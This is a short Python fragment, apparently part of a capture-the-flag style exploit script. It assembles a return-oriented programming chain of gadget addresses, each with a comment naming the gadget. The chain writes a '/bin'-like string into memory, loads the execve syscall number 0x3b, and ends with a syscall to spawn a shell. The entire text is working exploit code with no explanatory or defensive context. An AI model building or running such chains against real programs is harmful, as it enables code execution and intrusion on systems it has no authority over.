payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x447095)+p64(0x4312b9)
# 0x00000000004312b9: pop rbx; ret 0; 
payload += p64(0x6e69622f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x447099)+p64(0x4312b9)
# 0x00000000004312b9: pop rbx; ret 0; 
payload += p64(0x68662f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x432afa)
# 0x0000000000432afa: pop rdx; ret 0; 
payload += p64(0x447058)+p64(0x43619c)
# 0x000000000043619c: xchg edx, eax; ret; 
payload += p64(0x41b439)
# 0x000000000041b439: xchg edi, eax; ret; 
payload += p64(0x432afa)
# 0x0000000000432afa: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x43619c)
# 0x000000000043619c: xchg edx, eax; ret; 
payload += p64(0x417367)
# 0x0000000000417367: xchg esi, eax; ret; 
payload += p64(0x432afa)
# 0x0000000000432afa: pop rdx; ret 0; 
payload += p64(0x3b)+p64(0x43619c)
# 0x000000000043619c: xchg edx, eax; ret; 
payload += p64(0x432afa)
# 0x0000000000432afa: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x40bc15)
# 0x000000000040bc15: syscall; 
payload += b''
